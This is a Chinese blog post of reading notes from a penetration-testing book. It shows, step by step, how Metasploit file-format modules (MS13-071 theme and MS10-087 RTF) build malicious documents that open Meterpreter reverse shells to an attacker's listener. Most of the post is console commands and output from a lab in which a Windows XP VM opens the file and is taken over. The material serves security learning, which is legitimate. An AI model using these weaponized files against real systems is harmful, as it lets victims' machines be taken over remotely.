cstriker1407的笔记本

好记性不如铅笔头

安全, 操作系统

某《魔鬼训练营》读书笔记:metasploit生成特定格式漏洞文件

!!!笔记仅供学习交流使用,请勿进行其他用途!!!

Metasploit自带了很多漏洞文件生成模块,这里只笔记下最简单的使用:

root@kali:~# msfconsole
。。。。。。
。。。。。。
msf > search fileformat #搜索可用模块


Matching Modules
================


   Name                                                                   Disclosure Date          Rank       Description
   ----                                                                   ---------------          ----       -----------
。。。。。。
。。。。。。

第一种使用方式,不通过handler直接连接

msf> use exploit/windows/fileformat/ms13_071_theme
msf exploit(ms13_071_theme) > show payloads 


Compatible Payloads
===================


   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
。。。。。。。
。。。。。。。
msf exploit(ms13_071_theme) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_071_theme) > show options


Module options (exploit/windows/fileformat/ms13_071_theme):


   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FILENAME    msf.theme        yes       The theme file
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445              yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   UNCPATH                      no        Override the UNC path to use (Ex: \\192.168.1.1\share\exploit.scr)




Payload options (windows/meterpreter/reverse_tcp):


   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port




Exploit target:


   Id  Name
   --  ----
   0   Windows XP SP3 / Windows 2003 SP2


msf exploit(ms13_071_theme) > set LHOST 192.168.19.128
LHOST => 192.168.19.128
msf exploit(ms13_071_theme) > exploit
[*] Exploit running as background job.


[*] Started reverse handler on 192.168.19.128:4444 
msf exploit(ms13_071_theme) > [*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.19.128\mEjIom\pDuQX.scr
[*] Server started.
#此时在windows上打开文件msf.theme,点击【 屏幕保护 】选项卡,会触发漏洞,如下

[*] Sending stage (769024 bytes) to 192.168.19.129
[*] Meterpreter session 1 opened (192.168.19.128:4444 -> 192.168.19.129:1155) at 2014-06-04 21:45:19 +0800

msf exploit(ms13_071_theme) > sessions

Active sessions
===============

  Id  Type                   Information                                Connection
  --  ----                   -----------                                ----------
  1   meterpreter x86/win32  WINXP-PRO-VM\Administrator @ WINXP-PRO-VM  192.168.19.128:4444 -> 192.168.19.129:1155 (192.168.19.129)

msf exploit(ms13_071_theme) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : WINXP-PRO-VM
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32
meterpreter > 

第二种使用方式,通过handler连接

msf> use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf exploit(ms10_087_rtf_pfragments_bof) > show payloads 

Compatible Payloads
===================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
。。。。。。
。。。。。。
msf exploit(ms10_087_rtf_pfragments_bof) > set payload  windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_087_rtf_pfragments_bof) > show options

Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):


   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.rtf          yes       The file name.


Payload options (windows/meterpreter/reverse_tcp):


   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms10_087_rtf_pfragments_bof) > set LHOST 192.168.19.128 #将LHOST设置为本地IP
LHOST => 192.168.19.128
msf exploit(ms10_087_rtf_pfragments_bof) > set LPORT 8888 #手动设置下LPORT
LPORT => 8888
msf exploit(ms10_087_rtf_pfragments_bof) > exploit

[*] Creating 'msf.rtf' file ...
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
msf exploit(ms10_087_rtf_pfragments_bof) > back
msf> use exploit/multi/handler  #切换到handler模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 192.168.19.128 #设置好本地监听IP
LHOST => 192.168.19.128
msf exploit(handler) > set LPORT 8888  #设置好本地监听端口
LPORT => 8888
msf exploit(handler) > exploit 

[*] Started reverse handler on 192.168.19.128:8888 
[*] Starting the payload handler...
#在windows上打开msf.rtf文件,会触发漏洞,如下
[*] Sending stage (769024 bytes) to 192.168.19.129
[*] Meterpreter session 2 opened (192.168.19.128:8888 -> 192.168.19.129:1163) at 2014-06-04 21:53:35 +0800

meterpreter > sysinfo 
Computer        : WINXP-PRO-VM
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32
meterpreter > 

 

Leave a Reply

12 − 2 =

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

Theme by Anders Norén

苏ICP备16032087号